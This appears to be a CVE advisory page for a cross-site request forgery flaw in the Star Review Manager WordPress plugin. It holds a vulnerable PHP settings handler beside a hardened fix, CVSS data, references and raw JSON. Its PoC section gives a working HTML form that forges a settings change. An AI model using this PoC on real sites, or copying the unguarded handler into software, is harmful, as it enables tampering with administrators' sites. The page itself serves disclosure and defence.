Security Vulnerability Report
CVE-2026-1076 CVSS 4.3 MEDIUM

CVE-2026-1076

Published: 2026-01-24 08:16:08
Last Modified: 2026-04-15 00:35:42

Description

The Star Review Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing nonce validation on the settings page. This makes it possible for unauthenticated attackers to update the plugin's CSS settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
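As an added example, not the plugin's own code (function and option names are hypothetical), the settings-save pattern the description refers to, shown without and then with the capability and nonce checks WordPress provides for exactly this purpose:

```php
<?php
// Added example, not code from the Star Review Manager plugin. All function
// and option names below are hypothetical; the WordPress APIs are real.

// VULNERABLE pattern (CWE-352): stores whatever arrives in POST. Any page that
// gets a logged-in administrator's browser to POST here can change the CSS.
function srm_example_save_settings_vulnerable() {
    if ( isset( $_POST['srm_save_settings'] ) ) {
        update_option( 'srm_example_custom_css', wp_unslash( $_POST['srm_css_custom'] ) );
    }
}

// HARDENED pattern: require a capability, a nonce bound to this action, and
// sanitize the value before it is stored.
function srm_example_save_settings_fixed() {
    if ( ! isset( $_POST['srm_save_settings'] ) ) {
        return;
    }
    // 1. Capability: only users allowed to manage options may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'srm-example' ), 403 );
    }
    // 2. Nonce: check_admin_referer() stops with a 403 when the field is missing,
    //    expired, or was issued for another action or user. A form served from
    //    another origin cannot obtain a valid value for it.
    check_admin_referer( 'srm_example_save_settings', 'srm_settings_nonce' );

    // 3. Sanitize: strip markup so stored CSS cannot smuggle HTML into the admin page.
    $css = isset( $_POST['srm_css_custom'] )
        ? wp_strip_all_tags( wp_unslash( $_POST['srm_css_custom'] ) )
        : '';
    update_option( 'srm_example_custom_css', $css );
}

// The settings form must emit the matching nonce field so that legitimate
// submissions from the admin page pass check_admin_referer().
function srm_example_render_form() {
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'srm_example_save_settings', 'srm_settings_nonce' ); ?>
        <textarea name="srm_css_custom"><?php echo esc_textarea( get_option( 'srm_example_custom_css', '' ) ); ?></textarea>
        <input type="hidden" name="srm_save_settings" value="1">
        <?php submit_button( 'Save CSS' ); ?>
    </form>
    <?php
}
```

In a code review of a settings page, the check is simple: every handler that writes options must reach a `check_admin_referer()` or `wp_verify_nonce()` call, plus a `current_user_can()` check, before the first `update_option()`.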

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Star Review Manager plugin for WordPress <= 1.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CSRF PoC for CVE-2026-1076 -->
<!-- This PoC demonstrates how an attacker can forge a request to update -->
<!-- Star Review Manager CSS settings without proper nonce validation -->
<!DOCTYPE html>
<html>
<head>
  <title>CSRF PoC - Star Review Manager</title>
</head>
<body>
  <h1>CSRF PoC for CVE-2026-1076</h1>
  <p>Click the button below to trigger the forged request:</p>
  <form action="http://target-wordpress-site.com/wp-admin/admin.php?page=star-review-manager-settings" method="POST" id="csrfForm">
    <!-- Required form fields for settings update -->
    <input type="hidden" name="srm_css_custom" value="/* Malicious CSS injected via CSRF */">
    <input type="hidden" name="srm_settings_nonce" value="">
    <input type="hidden" name="srm_save_settings" value="1">
    <!-- Additional hidden fields to complete the request -->
    <input type="hidden" name="srm_star_color" value="red">
    <input type="hidden" name="srm_background_color" value="black">
  </form>
  <button type="submit" onclick="this.disabled=true;this.innerText='Submitting...';document.getElementById('csrfForm').submit();">
    Click Here
  </button>
  <script>
    // Auto-submit on page load (for demonstration)
    // document.getElementById('csrfForm').submit();
  </script>
</body>
</html>
<!-- Attack Scenario: -->
<!-- 1. Attacker creates a malicious page with the above form -->
<!-- 2. Attacker tricks a logged-in admin to visit the page -->
<!-- 3. Admin clicks the button (or form auto-submits) -->
<!-- 4. Browser sends the request with admin's cookies -->
<!-- 5. Server processes the request without CSRF validation -->
<!-- 6. Plugin CSS settings are updated with attacker's values -->

References

https://plugins.trac.wordpress.org/browser/star-review-manager/tags/1.2.2/admin/settings.php#L3
https://plugins.trac.wordpress.org/browser/star-review-manager/trunk/admin/settings.php#L3
https://www.wordfence.com/threat-intel/vulnerabilities/id/54b6a141-eb4c-4cf0-a078-5b3aeda25466?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1076", "sourceIdentifier": "[email protected]", "published": "2026-01-24T08:16:08.140", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Star Review Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing nonce validation on the settings page. This makes it possible for unauthenticated attackers to update the plugin's CSS settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}, {"lang": "es", "value": "El plugin Star Review Manager para WordPress es vulnerable a la falsificación de petición en sitios cruzados en todas las versiones hasta la 1.2.2, inclusive. Esto se debe a la falta de validación de nonce en la página de configuración. Esto hace posible que atacantes no autenticados actualicen la configuración CSS del plugin a través de una petición falsificada, siempre que puedan engañar a un administrador del sitio para que realice una acción como hacer clic en un enlace."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/star-review-manager/tags/1.2.2/admin/settings.php#L3", "source": "[email protected]"}, {"url": 
"https://plugins.trac.wordpress.org/browser/star-review-manager/trunk/admin/settings.php#L3", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/54b6a141-eb4c-4cf0-a078-5b3aeda25466?source=cve", "source": "[email protected]"}]}}